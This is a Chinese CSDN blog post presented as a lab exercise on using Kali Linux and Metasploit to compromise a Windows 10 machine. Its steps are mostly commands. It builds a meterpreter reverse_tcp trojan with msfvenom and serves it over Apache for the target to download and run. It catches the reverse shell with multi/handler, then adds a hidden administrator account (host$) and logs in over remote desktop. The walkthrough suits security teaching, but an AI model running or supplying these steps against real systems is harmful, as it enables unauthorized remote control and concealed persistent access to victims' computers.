2021-12-09 使用kali生成木马,渗透Windows系统

本文详细介绍了如何使用Kali Linux中的Metasploit框架生成木马,并通过Apache服务部署到Web服务器,诱导Windows 10靶机下载执行,最终实现对靶机的远程控制。实验步骤包括生成木马、开启服务、设置攻击模块、渗透及验证等关键环节。
摘要由CSDN通过智能技术生成

本文章仅供学习和参考!

欢迎交流~

目录

一、实验题目:使用kali生成木马,渗透Windows系统

二、实验内容:

        使用kali中的Metasploit生成木马,控制Windows系统

三、实验环境:

1. 攻击者IP(kali):192.168.112.130

2. 靶机IP(Windows10):192.168.112.136

三、实验步骤:

1. 保证两个系统能相互ping通

2. 生成木马,在kali打开终端,输入以下命令:

3. 进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html,输入命令:

4. 进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:

5. 开启apache服务,输入命令:

     可用以下命令查看服务开启状态:

6. 在Windows10靶机上打开浏览器,输入kali的IP,访问kali并下载木马文件evilshell.exe

7. 开启postgresql服务,其端口号为5432,输入命令:

     可用以下命令查看服务开启状态:

8. 查看端口,输入命令:

9. 开启msfconsole,输入命令:

10.设置攻击模块并运行,输入命令:

11. 在靶机中双击运行木马文件(evilshell.exe)

12. 获取目标主机shell,输入命令:

     若出现乱码现象,可输入命令:

13. 输入ipconfig,查看靶机的IP地址:

14. 在靶机中添加一个隐藏用户(后面加$),并提升隐藏用户的权限,输入以下命令:

15. kali打开一个新的终端,使用远程桌面连接靶机(靶机需要开启远程连接服务),输入命令:

16. 使用 host$/密码 登录靶机,登录成功后,使用管理员权限打开cmd,添加一个新用户,添加成功则证明渗透成功!


一、实验题目:使用kali生成木马,渗透Windows系统

二、实验内容:

        使用kali中的Metasploit生成木马,控制Windows系统

三、实验环境:

1. 攻击者IP(kali):192.168.112.130

2. 靶机IP(Windows10):192.168.112.136

三、实验步骤:

1. 保证两个系统能相互ping通

2. 生成木马,在kali打开终端,输入以下命令:

 msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击者IP lport=监听端口 -f 后门文件类型 >/后门文件存放路径/evilshell.exe

3. 进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html,输入命令:

cp evilshell.exe /var/www/html

4. 进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:

rm 文件1 文件2 ... 文件n

5. 开启apache服务,输入命令:

/etc/init.d/apache2 start

     可用以下命令查看服务开启状态:

/etc/init.d/apache2 status

6. 在Windows10靶机上打开浏览器,输入kali的IP,访问kali并下载木马文件evilshell.exe

      将文件下载到桌面,方便测试:

7. 开启postgresql服务,其端口号为5432,输入命令:

/etc/init.d/postgresql start 

     可用以下命令查看服务开启状态:

/etc/init.d/postgresql status

8. 查看端口,输入命令:

netstat -ntulp

9. 开启msfconsole,输入命令:

msfconsole  

 

10.设置攻击模块并运行,输入命令:

use exploit/multi/handler     //选择exploits

set payload windows/meterpreter/reverse_tcp   //设置payload

set LHOST  攻击者IP        //修改LHOST参数
    
set LPORT  监听端口        //修改LPORT参数

show options              //查看需要设置的参数

run 或 exploit            //运行攻击模块

11. 在靶机中双击运行木马文件(evilshell.exe)

12. 获取目标主机shell,输入命令:

shell

     若出现乱码现象,可输入命令:

chcp 437

13. 输入ipconfig,查看靶机的IP地址:

14. 在靶机中添加一个隐藏用户(后面加$),并提升隐藏用户的权限,输入以下命令:

net user host$ /add       //添加隐藏用户host$

net user                  //查看用户

net user host$ 密码       //为host$用户设置密码

net localgroup administrators host$ /add    //将host$用户加入到管理员组中,从而提升权限

net user host$            //查看host$用户信息

15. kali打开一个新的终端,使用远程桌面连接靶机(靶机需要开启远程连接服务),输入命令:

rdesktop 靶机IP

16. 使用 host$/密码 登录靶机,登录成功后,使用管理员权限打开cmd,添加一个新用户,添加成功则证明渗透成功!

      添加用户:

  • 22
    点赞
  • 182
    收藏
    觉得还不错? 一键收藏
  • 15
    评论
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值